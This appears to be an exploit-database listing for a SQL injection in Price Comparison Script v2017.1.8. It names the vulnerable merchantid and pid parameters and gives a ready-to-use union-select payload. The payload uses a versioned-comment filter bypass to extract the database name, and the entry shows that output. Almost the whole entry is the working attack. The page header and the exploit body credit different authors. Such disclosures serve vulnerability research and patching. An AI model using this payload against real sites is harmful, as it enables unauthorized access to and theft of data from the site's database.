Price Comparison Script 2017.1.8 - SQL Injection

Gerardo Vazquez, Eduardo Arriols 10.03.2017 Verified Wait
Web Application Exploits PHP

Exploit Code

# # # # # 
# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/price-comparison-script.php
# Demo: http://www.pricecomparisonscript.info/
# Version: 2017.1.8
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# http://localhost/[PATH]/compare.php?pid=[SQL]
# For example;
# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
# axisitp_newpcs
# Etc..
# # # # #